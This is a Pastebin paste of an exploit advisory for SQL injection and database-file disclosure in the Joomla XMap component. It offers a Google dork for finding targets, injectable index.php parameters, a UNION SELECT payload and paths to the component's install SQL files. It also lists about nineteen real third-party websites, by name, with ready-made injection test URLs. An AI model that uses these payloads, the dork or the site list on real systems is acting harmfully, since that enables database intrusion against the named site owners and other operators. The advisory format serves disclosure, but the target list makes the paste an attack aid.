Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Joomla XMap Components 2.3.0 SQL Injection / Database Disclosure
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 30/01/2019
- # Vendor Homepage : joomla.org
- # Software Download Links : joomla4ever.org/archive/ext/com_xmap.zip
- joomlacode.org/gf/project/xmap/frs/?action=FrsReleaseBrowse&frs_package_id=3882
- rsjoomla.com/support/documentation/rsblog-/plugins-and-modules/xmap-plugin.html
- # Software Information Link : joomla4ever.org/extensions/ext-xmap
- # Software Versions : 1.2.7 / 2.3.0 and other versions
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/index.php?option=com_xmap''
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- CWE-200 [ Information Exposure ]
- # Similar but for old Version CVE : cvedetails.com/cve/CVE-2010-2678/ - CVE-2010-2678
- Note : Keep in mind. This Exploit/Vuln has been told in more details.
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- # Reference Link : cxsecurity.com/issue/WLB-2019010285
- ####################################################################
- # Description about Software :
- ***************************
- "XMAP" is open source software for Joomla.
- ####################################################################
- # Impact :
- ***********
- * SQL injection vulnerability in xmap (com_xmap) component for Joomla!
- allows remote attackers to execute arbitrary SQL commands via the Itemid parameter to index.php.
- * Successful exploitation will let attackers to manipulate SQL queries by injecting arbitrary SQL code.
- * The flaw is due to input passed via 'view=' and 'Itemid=' parameter to 'index.php'
- is not properly sanitised before being used in a SQL query.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_xmap&Itemid=[SQL Injection]
- /index.php?option=com_xmap&sitemap=[ID-NUMBER]&Itemid=[SQL Injection]
- /index.php?option=com_xmap&tmpl=component&Itemid=[ID-NUMBER]&view=[SQL Injection]
- /index.php?option=com_xmap&view=html&id=[ID-NUMBER]&Itemid=[SQL Injection]
- # Exploit Payload :
- *****************
- -1 UNION SELECT 1,2,3,version(),5,6,7,8--
- ####################################################################
- # Database Disclosure Exploit :
- ****************************
- /administrator/components/com_xmap/install/install.postgresql.sql
- /administrator/components/com_xmap/install/install.utf8.sql
- /administrator/components/com_xmap/install/uninstall.postgresql.sql
- /administrator/components/com_xmap/install/uninstall.utf8.sql
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] sab-uae.com/web/administrator/components/com_xmap/install/install.utf8.sql
- [+] didasconline.it/didasco/index.php?option=com_xmap&sitemap=1&Itemid=6%27
- [+] beta.systemsvalley.com/index.php?option=com_xmap&view=html&id=1&Itemid=318%27
- [+] agenda21.waw.pl/index.php?option=com_xmap&sitemap=1&Itemid=52%27
- [+] arcoeste.it/portale/index.php?option=com_xmap&sitemap=1&Itemid=95%27
- [+] old.bit-karton.ru/index.php?option=com_xmap&view=html&id=0&Itemid=173%27
- [+] thscleaning.co.uk/index.php?option=com_xmap&sitemap=1&Itemid=8%27
- [+] emmekappa.eu/index.php?option=com_xmap&view=html&id=1&Itemid=155%27
- [+] ortopedie-mangalia.ro/index.php?option=com_xmap&sitemap=1&Itemid=8%27
- [+] atabeh.ps/index.php?option=com_xmap&sitemap=1&Itemid=51%27
- [+] acmu.fr/index.php?option=com_xmap&Itemid=124%27
- [+] solardid.com/index.php?option=com_xmap&sitemap=1&Itemid=9%27
- [+] serviceairtunisia.com/index.php?option=com_xmap&sitemap=1&Itemid=30%27
- [+] cprsanmiguel.com/index.php?option=com_xmap&sitemap=1&Itemid=65%27
- [+] arrozsonora.com.co/index.php?option=com_xmap&sitemap=1&Itemid=9%27
- [+] annegil.crouzevialle.free.fr/index.php?option=com_xmap&sitemap=1&Itemid=43%27
- [+] truongsonfurniture.com/index.php?option=com_xmap&view=html&id=1&Itemid=137%27
- [+] apedema.org.br/index.php?option=com_xmap&sitemap=1&Itemid=17%27
- [+] garagepiccina.ch/index.php?option=com_xmap&sitemap=1&Itemid=15%27
- ####################################################################
- # Example SQL Database Error :
- ****************************
- Strict Standards: Declaration of JCacheControllerPage::store() should be compatible
- with JCacheController::store($data, $id, $group = NULL) in /home
- /systemsvalley/subdomains/beta.systemsvalley.com/libraries
- /joomla/cache/controller/page.php on line 0
- Warning: session_start() [function.session-start]: Cannot send session cookie -
- headers already sent by (output started at /htdocs/public/www/configuration.php:1)
- in /htdocs/public/www/libraries/joomla/session/session.php on line 413
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement